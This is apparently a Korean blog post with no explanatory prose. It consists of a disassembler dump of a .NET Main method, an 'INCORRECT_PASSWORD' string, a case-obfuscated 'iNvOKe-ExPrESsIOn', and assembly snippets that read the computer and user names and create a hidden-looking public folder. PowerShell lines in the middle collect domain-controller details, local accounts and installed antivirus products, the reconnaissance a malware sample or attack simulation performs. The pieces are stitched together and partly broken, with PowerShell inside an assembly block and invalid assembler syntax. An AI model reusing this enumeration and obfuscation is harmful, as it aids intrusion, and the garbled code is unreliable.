**************************************************************
* FUNCTION *
**************************************************************
int __fastcall Main(int args, int * param_2)
int EAX:4 <RETURN>
int ECX:4 args
int * EDX:4 param_2
.NET CLR Managed Code
Main
004044ac 14 13 17 db[1315]
14 13 18
14 13 19
004044ac [0] 14h, 13h, 17h, 14h,
004044b0 [4] 13h, 18h, 14h, 13h,
004044b4 [8] 19h, 73h, 7Ah, 0h,
004044b8 [12] 0h, 6h, 13h, 1Ah,
004044bc [16] 28h, E8h, 0h, 0h,
004044c0 [20] Ah, 73h, 79h, 0h,
004044c4 [24] 0h, 6h, Ah, 16h,
004044c8 [28] Bh, 7Eh, 14h, 0h,
004044cc [32] 0h, Ah, Ch, 11h,
004044d0 [36] 1Ah, 73h, 3Ah, 0h,
004044d4 [40] 0h, 6h, 7Dh, 58h,
004044d8 [44] 0h, 0h, 4h, 6h,
004044dc [48] 11h, 1Ah, 7Bh, 58h,
004044e0 [52] 0h, 0h, 4h, 73h,
004044e4 [56] 4Dh, 0h, 0h, 6h,
004044e8 [60] Dh, 11h, 1Ah, 16h,
004044ec [64] 73h, E9h, 0h, 0h,
004044f0 [68] Ah, 7Dh, 59h, 0h,
004044f4 [72] 0h, 4h, 28h, 27h,
004044f8 [76] 0h, 0h, Ah, 14h,
004044fc [80] FEh, 6h, 78h, 0h,
00404500 [84] 0h, 6h, 73h, EAh,
00404504 [88] 0h, 0h, Ah, 6Fh,
00404508 [92] EBh, 0h, 0h, Ah,
0040450c [96] 9h, 28h, ECh, 0h,
00404510 [100] 0h, Ah, 13h, 4h,
00404514 [104] 11h, 4h, 16h, 6Fh,
00404518 [108] EDh, 0h, 0h, Ah,
0040451c [112] 11h, 4h, 6Fh, EEh,
00404520 [116] 0h, 0h, Ah, 28h,
00404524 [120] EFh, 0h, 0h, Ah,
00404528 [124] 13h, 5h, 11h, 5h,
0040452c [128] 11h, 4h, 6Fh, F0h,
00404530 [132] 0h, 0h, Ah, 11h,
00404534 [136] 5h, 6Fh, F1h, 0h,
00404538 [140] 0h, Ah, 6Fh, F2h,
0040453c [144] 0h, 0h, Ah, 11h,
00404540 [148] 17h, 2Dh, Fh, 11h,
00404544 [152] 1Ah, FEh, 6h, 7Bh,
00404548 [156] 0h, 0h, 6h, 73h,
0040454c [160] F3h, 0h, 0h, Ah,
00404550 [164] 13h, 17h, 11h, 17h,
00404554 [168] 6Fh, F4h, 0h, 0h,
00404558 [172] Ah, 73h, F5h, 0h,
0040455c [176] 0h, Ah, 13h, 6h,
00404560 [180] 28h, 36h, 0h, 0h,
00404564 [184] 6h, 2Ch, 1Ch, 72h,
00404568 [188] 1h, 0h, 0h, 70h,
0040456c [192] 13h, 7h, 2Bh, 9h,
00404570 [196] 11h, 6h, 11h, 7h,
00404574 [200] 6Fh, F6h, 0h, 0h,
00404578 [204] Ah, 28h, F7h, 0h,
0040457c [208] 0h, Ah, 25h, 13h,
00404580 [212] 7h, 2Dh, EDh, 11h,
00404584 [216] 6h, 6Fh, F8h, 0h,
00404588 [220] 0h, Ah, 73h, F9h,
0040458c [224] 0h, 0h, Ah, 13h,
00404590 [228] 8h, 11h, 8h, 11h,
00404594 [232] 18h, 2Dh, Fh, 11h,
00404598 [236] 1Ah, FEh, 6h, 7Ch,
0040459c [240] 0h, 0h, 6h, 73h,
004045a0 [244] F3h, 0h, 0h, Ah,
004045a4 [248] 13h, 18h, 11h, 18h,
004045a8 [252] 6Fh, FAh, 0h, 0h,
004045ac [256] Ah, 16h, 13h, 9h,
004045b0 [260] 16h, 13h, Ah, 2h,
004045b4 [264] 13h, 1Ch, 16h, 13h,
004045b8 [268] 1Dh, 38h, C7h, 0h,
004045bc [272] 0h, 0h, 11h, 1Ch,
004045c0 [276] 11h, 1Dh, 9Ah, 13h,
004045c4 [280] Bh, 11h, Bh, 72h,
004045c8 [284] 7Bh, 2h, 0h, 70h,
004045cc [288] 17h, 28h, FBh, 0h,
004045d0 [292] 0h, Ah, 2Dh, 7h,
004045d4 [296] 17h, Bh, 38h, 9Eh,
004045d8 [300] 0h, 0h, 0h, 11h,
004045dc [304] Bh, 72h, 87h, 2h,
004045e0 [308] 0h, 70h, 19h, 6Fh,
004045e4 [312] FCh, 0h, 0h, Ah,
004045e8 [316] 2Ch, 61h, 11h, Bh,
004045ec [320] 17h, 8Dh, 33h, 0h,
004045f0 [324] 0h, 1h, 13h, 1Eh,
004045f4 [328] 11h, 1Eh, 16h, 72h,
004045f8 [332] 99h, 2h, 0h, 70h,
004045fc [336] A2h, 11h, 1Eh, 18h,
00404600 [340] 17h, 6Fh, FDh, 0h,
00404604 [344] 0h, Ah, 13h, Ch,
00404608 [348] 11h, Ch, 8Eh, 69h,
0040460c [352] 18h, 2Eh, 20h, 72h,
00404610 [356] 9Dh, 2h, 0h, 70h,
00404614 [360] 28h, 27h, 0h, 0h,
00404618 [364] Ah, 6Fh, 28h, 0h,
0040461c [368] 0h, Ah, 16h, 1Fh,
00404620 [372] 10h, 28h, D5h, 0h,
00404624 [376] 0h, Ah, 26h, 17h,
00404628 [380] 13h, 1Bh, DDh, 9Dh,
0040462c [384] 3h, 0h, 0h, 11h,
00404630 [388] Ch, 17h, 9Ah, 17h,
00404634 [392] 8Dh, 62h, 0h, 0h,
00404638 [396] 1h, 13h, 1Fh, 11h,
0040463c [400] 1Fh, 16h, 1Fh, 22h,
00404640 [404] 9Dh, 11h, 1Fh, 6Fh,
00404644 [408] FEh, 0h, 0h, Ah,
00404648 [412] Ch, 2Bh, 2Eh, 11h,
0040464c [416] Bh, 72h, 7Ch, 3h,
00404650 [420] 0h, 70h, 17h, 28h,
00404654 [424] FBh, 0h, 0h, Ah,
00404658 [428] 2Dh, 8h, 11h, Ah,
0040465c [432] 17h, 58h, 13h, 9h,
00404660 [436] 2Bh, 2Eh, 11h, Bh,
00404664 [440] 72h, 86h, 3h, 0h,
00404668 [444] 70h, 17h, 28h, FBh,
0040466c [448] 0h, 0h, Ah, 2Dh,
00404670 [452] 8h, 28h, FFh, 0h,
00404674 [456] 0h, Ah, 26h, 2Bh,
00404678 [460] 17h, 11h, Ah, 17h,
0040467c [464] 58h, 13h, Ah, 11h,
00404680 [468] 1Dh, 17h, 58h, 13h,
00404684 [472] 1Dh, 11h, 1Dh, 11h,
00404688 [476] 1Ch, 8Eh, 69h, 3Fh,
0040468c [480] 2Eh, FFh, FFh, FFh,
00404690 [484] 28h, 46h, 0h, 0h,
00404694 [488] Ah, 13h, Dh, 11h,
00404698 [492] Dh, 72h, 94h, 3h,
0040469c [496] 0h, 70h, 6Fh, 0h,
004046a0 [500] 1h, 0h, Ah, 13h,
004046a4 [504] Eh, 11h, Eh, 28h,
004046a8 [508] 1h, 1h, 0h, Ah,
004046ac [512] 73h, 2h, 1h, 0h,
004046b0 [516] Ah, 13h, Fh, 11h,
004046b4 [520] Fh, 6Fh, 3h, 1h,
004046b8 [524] 0h, Ah, 13h, 10h,
004046bc [528] 8h, 28h, Dh, 0h,
004046c0 [532] 0h, Ah, 2Dh, 10h,
004046c4 [536] 8h, 11h, 10h, 28h,
004046c8 [540] 4h, 1h, 0h, Ah,
004046cc [544] 16h, 13h, 1Bh, DDh,
004046d0 [548] F8h, 2h, 0h, 0h,
004046d4 [552] 11h, 5h, 11h, 10h,
004046d8 [556] 6Fh, 5h, 1h, 0h,
004046dc [560] Ah, 26h, DEh, Ch,
004046e0 [564] 11h, Fh, 2Ch, 7h,
004046e4 [568] 11h, Fh, 6Fh, 5Eh,
004046e8 [572] 0h, 0h, Ah, DCh,
004046ec [576] DEh, Ch, 11h, Eh,
004046f0 [580] 2Ch, 7h, 11h, Eh,
004046f4 [584] 6Fh, 5Eh, 0h, 0h,
004046f8 [588] Ah, DCh, 14h, 13h,
004046fc [592] 11h, 72h, AAh, 3h,
00404700 [596] 0h, 70h, 73h, 6h,
00404704 [600] 1h, 0h, Ah, 13h,
00404708 [604] 12h, 11h, 9h, 13h,
0040470c [608] 13h, 38h, AEh, 1h,
00404710 [612] 0h, 0h, 11h, 12h,
00404714 [616] 2h, 11h, 13h, 9Ah,
00404718 [620] 6Fh, 7h, 1h, 0h,
0040471c [624] Ah, 13h, 14h, 11h,
00404720 [628] 14h, 6Fh, 8h, 1h,
00404724 [632] 0h, Ah, 39h, 6Ch,
00404728 [636] 1h, 0h, 0h, 11h,
0040472c [640] 14h, 6Fh, 9h, 1h,
00404730 [644] 0h, Ah, 6Fh, Ah,
00404734 [648] 1h, 0h, Ah, 19h,
00404738 [652] 40h, 5Ah, 1h, 0h,
0040473c [656] 0h, 2h, 11h, 13h,
00404740 [660] 9Ah, 12h, 15h, 28h,
00404744 [664] Bh, 1h, 0h, Ah,
00404748 [668] 3Ah, 4Ah, 1h, 0h,
0040474c [672] 0h, 11h, 11h, 2Ch,
00404750 [676] Ah, 11h, 5h, 11h,
00404754 [680] 11h, 6Fh, Ch, 1h,
00404758 [684] 0h, Ah, 26h, 11h,
0040475c [688] 14h, 6Fh, 9h, 1h,
00404760 [692] 0h, Ah, 18h, 6Fh,
00404764 [696] Dh, 1h, 0h, Ah,
00404768 [700] 6Fh, Eh, 1h, 0h,
0040476c [704] Ah, 6Fh, Fh, 1h,
00404770 [708] 0h, Ah, 72h, 1h,
00404774 [712] 0h, 0h, 70h, 28h,
00404778 [716] C3h, 0h, 0h, Ah,
0040477c [720] 2Ch, 19h, 11h, 14h,
00404780 [724] 6Fh, 9h, 1h, 0h,
00404784 [728] Ah, 17h, 6Fh, Dh,
00404788 [732] 1h, 0h, Ah, 6Fh,
0040478c [736] Eh, 1h, 0h, Ah,
00404790 [740] 13h, 11h, 38h, 23h,
00404794 [744] 1h, 0h, 0h, 11h,
00404798 [748] 14h, 6Fh, 9h, 1h,
0040479c [752] 0h, Ah, 18h, 6Fh,
004047a0 [756] Dh, 1h, 0h, Ah,
004047a4 [760] 6Fh, Eh, 1h, 0h,
004047a8 [764] Ah, 72h, DAh, 3h,
004047ac [768] 0h, 70h, 28h, C3h,
004047b0 [772] 0h, 0h, Ah, 2Dh,
004047b4 [776] 23h, 11h, 14h, 6Fh,
004047b8 [780] 9h, 1h, 0h, Ah,
004047bc [784] 18h, 6Fh, Dh, 1h,
004047c0 [788] 0h, Ah, 6Fh, Eh,
004047c4 [792] 1h, 0h, Ah, 6Fh,
004047c8 [796] 10h, 1h, 0h, Ah,
004047cc [800] 72h, E4h, 3h, 0h,
004047d0 [804] 70h, 28h, C3h, 0h,
004047d4 [808] 0h, Ah, 2Ch, 28h,
004047d8 [812] 11h, 5h, 11h, 14h,
004047dc [816] 6Fh, 9h, 1h, 0h,
004047e0 [820] Ah, 17h, 6Fh, Dh,
004047e4 [824] 1h, 0h, Ah, 6Fh,
004047e8 [828] Eh, 1h, 0h, Ah,
004047ec [832] 17h, 8Ch, 8Dh, 0h,
004047f0 [836] 0h, 1h, 6Fh, 11h,
004047f4 [840] 1h, 0h, Ah, 26h,
004047f8 [844] 14h, 13h, 11h, 38h,
004047fc [848] BAh, 0h, 0h, 0h,
00404800 [852] 11h, 14h, 6Fh, 9h,
00404804 [856] 1h, 0h, Ah, 18h,
00404808 [860] 6Fh, Dh, 1h, 0h,
0040480c [864] Ah, 6Fh, Eh, 1h,
00404810 [868] 0h, Ah, 72h, F0h,
00404814 [872] 3h, 0h, 70h, 28h,
00404818 [876] C3h, 0h, 0h, Ah,
0040481c [880] 2Dh, 23h, 11h, 14h,
00404820 [884] 6Fh, 9h, 1h, 0h,
00404824 [888] Ah, 18h, 6Fh, Dh,
00404828 [892] 1h, 0h, Ah, 6Fh,
0040482c [896] Eh, 1h, 0h, Ah,
00404830 [900] 6Fh, 10h, 1h, 0h,
00404834 [904] Ah, 72h, FCh, 3h,
00404838 [908] 0h, 70h, 28h, C3h,
0040483c [912] 0h, 0h, Ah, 2Ch,
00404840 [916] 25h, 11h, 5h, 11h,
00404844 [920] 14h, 6Fh, 9h, 1h,
00404848 [924] 0h, Ah, 17h, 6Fh,
0040484c [928] Dh, 1h, 0h, Ah,
00404850 [932] 6Fh, Eh, 1h, 0h,
00404854 [936] Ah, 16h, 8Ch, 8Dh,
00404858 [940] 0h, 0h, 1h, 6Fh,
0040485c [944] 11h, 1h, 0h, Ah,
00404860 [948] 26h, 14h, 13h, 11h,
00404864 [952] 2Bh, 54h, 11h, 5h,
00404868 [956] 11h, 14h, 6Fh, 9h,
0040486c [960] 1h, 0h, Ah, 17h,
00404870 [964] 6Fh, Dh, 1h, 0h,
00404874 [968] Ah, 6Fh, Eh, 1h,
00404878 [972] 0h, Ah, 11h, 14h,
0040487c [976] 6Fh, 9h, 1h, 0h,
00404880 [980] Ah, 18h, 6Fh, Dh,
00404884 [984] 1h, 0h, Ah, 6Fh,
00404888 [988] Eh, 1h, 0h, Ah,
0040488c [992] 6Fh, 11h, 1h, 0h,
00404890 [996] Ah, 26h, 14h, 13h,
00404894 [1000] 11h, 2Bh, 23h, 11h,
00404898 [1004] 11h, 2Ch, 13h, 11h,
0040489c [1008] 5h, 11h, 11h, 2h,
004048a0 [1012] 11h, 13h, 9Ah, 6Fh,
004048a4 [1016] 11h, 1h, 0h, Ah,
004048a8 [1020] 26h, 14h, 13h, 11h,
004048ac [1024] 2Bh, Ch, 11h, 5h,
004048b0 [1028] 2h, 11h, 13h, 9Ah,
004048b4 [1032] 6Fh, 12h, 1h, 0h,
004048b8 [1036] Ah, 26h, 11h, 13h,
004048bc [1040] 17h, 58h, 13h, 13h,
004048c0 [1044] 11h, 13h, 2h, 8Eh,
004048c4 [1048] 69h, 3Fh, 48h, FEh,
004048c8 [1052] FFh, FFh, 11h, 11h,
004048cc [1056] 2Ch, Ah, 11h, 5h,
004048d0 [1060] 11h, 11h, 6Fh, Ch,
004048d4 [1064] 1h, 0h, Ah, 26h,
004048d8 [1068] 11h, 5h, 72h, Ah,
004048dc [1072] 4h, 0h, 70h, 6Fh,
004048e0 [1076] 13h, 1h, 0h, Ah,
004048e4 [1080] 26h, 11h, 5h, 72h,
004048e8 [1084] 20h, 4h, 0h, 70h,
004048ec [1088] 6Fh, Ch, 1h, 0h,
004048f0 [1092] Ah, 26h, 11h, 5h,
004048f4 [1096] 11h, 6h, 11h, 8h,
004048f8 [1100] 14h, 11h, 19h, 2Dh,
004048fc [1104] Fh, 11h, 1Ah, FEh,
00404900 [1108] 6h, 7Dh, 0h, 0h,
00404904 [1112] 6h, 73h, 14h, 1h,
00404908 [1116] 0h, Ah, 13h, 19h,
0040490c [1120] 11h, 19h, 14h, 6Fh,
00404910 [1124] 2h, 0h, 0h, 2Bh,
00404914 [1128] 26h, 6h, 6Fh, 73h,
00404918 [1132] 0h, 0h, 6h, 2Dh,
0040491c [1136] 10h, 11h, 1Ah, 7Bh,
00404920 [1140] 59h, 0h, 0h, 4h,
00404924 [1144] 1Fh, 64h, 6Fh, 16h,
00404928 [1148] 1h, 0h, Ah, 2Ch,
0040492c [1152] E8h, 11h, 5h, 6Fh,
00404930 [1156] 17h, 1h, 0h, Ah,
00404934 [1160] 11h, 5h, 6Fh, 18h,
00404938 [1164] 1h, 0h, Ah, 6Fh,
0040493c [1168] 19h, 1h, 0h, Ah,
00404940 [1172] 1Bh, 33h, 1Dh, 11h,
00404944 [1176] 1Ah, 7Bh, 58h, 0h,
00404948 [1180] 0h, 4h, 11h, 5h,
0040494c [1184] 6Fh, 18h, 1h, 0h,
00404950 [1188] Ah, 6Fh, 1Ah, 1h,
00404954 [1192] 0h, Ah, 6Fh, E3h,
00404958 [1196] 0h, 0h, Ah, 6Fh,
0040495c [1200] E4h, 0h, 0h, Ah,
00404960 [1204] DEh, Ch, 11h, 5h,
00404964 [1208] 2Ch, 7h, 11h, 5h,
00404968 [1212] 6Fh, 5Eh, 0h, 0h,
0040496c [1216] Ah, DCh, 11h, 4h,
00404970 [1220] 6Fh, 1Bh, 1h, 0h,
00404974 [1224] Ah, DEh, Ch, 11h,
00404978 [1228] 4h, 2Ch, 7h, 11h,
0040497c [1232] 4h, 6Fh, 5Eh, 0h,
00404980 [1236] 0h, Ah, DCh, DEh,
00404984 [1240] 28h, 13h, 16h, 72h,
00404988 [1244] 2Eh, 4h, 0h, 70h,
0040498c [1248] 11h, 16h, 6Fh, E3h,
00404990 [1252] 0h, 0h, Ah, 28h,
00404994 [1256] A6h, 0h, 0h, Ah,
00404998 [1260] 28h, 27h, 0h, 0h,
0040499c [1264] Ah, 6Fh, 28h, 0h,
004049a0 [1268] 0h, Ah, 16h, 1Fh,
004049a4 [1272] 10h, 28h, D5h, 0h,
004049a8 [1276] 0h, Ah, 26h, DEh,
004049ac [1280] 0h, 7h, 2Ch, 15h,
004049b0 [1284] 72h, 5Ch, 4h, 0h,
004049b4 [1288] 70h, 28h, 27h, 0h,
004049b8 [1292] 0h, Ah, 6Fh, 28h,
004049bc [1296] 0h, 0h, Ah, 28h,
004049c0 [1300] AAh, 0h, 0h, Ah,
004049c4 [1304] 26h, 6h, 6Fh, 75h,
004049c8 [1308] 0h, 0h, 6h, 2Ah,
004049cc [1312] 11h, 1Bh, 2Ah
section .data
computerName db ' ' * 256
bufferLen dd 256
section .text
global _start
004087d7 49 4e 43 4f 52 utf8 u8"INCORRECT_PASSWORD" [2a3]
52 45 43 54 5f
50 41 53 53 57
73 C9 00 00 0A 0A 17 28 CD 00 00 0A 0B 12 01 28 CE 00 00 0A
1F 0D 33 07 28 CF 00 00 0A 2B 4F 12 01 28 CE 00 00 0A 1E 33
23 06 6F D0 00 00 0A 16 31 D4 06 06 6F D0 00 00 0A 17 59 6F
D1 00 00 0A 72 49 02 00 70 28 D2 00 00 0A 2B BA 12 01 28 D3
00 00 0A 2C B1 06 12 01 28 D3 00 00 0A 6F CB 00 00 0A 72 51
02 00 70 28 D2 00 00 0A 2B 98 06 2A
iNvOKe-ExPrESsIOn
_start:
; Get computer name using GetComputerNameA from kernel32.dll
push dword [bufferLen]
lea eax, [computerName]
push eax
call GetComputerNameA
; Exit the process
push 0 ; Exit code 0
call ExitProcess
section .data
userName db ' ' * 256
bufferLen dd 256
section .text
global _start
_start:
; Get username using GetUserNameA from advapi32.dll
push dword [bufferLen]
lea eax, [userName]
push eax
call GetUserNameA
; Exit the process
push 0 ; Exit code 0
call ExitProcess
section .data
dirPath db 'C:\Users\Public\Public Files', 0
section .text
global _start
_start:
; Create directory using CreateDirectoryA from kernel32.dll
push 0
lea eax, [dirPath]
push eax
call CreateDirectoryA
nltest /dsgetdc:$env:USERDOMAIN 2>$null | Out-File -FilePath (Join-Path $targetDir 'DCinfo.txt') -Force
Get-WmiObject -Class Win32_UserAccount | Out-File -FilePath (Join-Path $targetDir 'localusers.txt') -Force
wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value 2>$null | Out-File -FilePath (Join-Path $targetDir 'AVinfo.txt') -Force
; Exit the process
push 0 ; Exit code 0
call ExitProcess
section .data
srcFile db 'C:\path\to\source.txt', 0
dstFile db 'C:\path\to\destination.txt', 0
section .text
global _start
_start:
; Copy file using CopyFileA from kernel32.dll
lea eax, [srcFile]
push eax
lea eax, [dstFile]
push eax
push 1
call CopyFileA
; Exit the process
push 0 ; Exit code 0
call ExitProcess
'호그와트' 카테고리의 다른 글
| CVE 2024 27198 without annoying faker lib (0) | 2024.10.20 |
|---|---|
| white bird attack ! (0) | 2024.10.13 |
| 문크예거 딸의 운전 실력은 어느정도일까 ? (1) | 2024.10.07 |
| just rolling the dices~~~ (0) | 2024.09.26 |
| 췤췤 머신 그저 감사합니다 !! (0) | 2024.08.18 |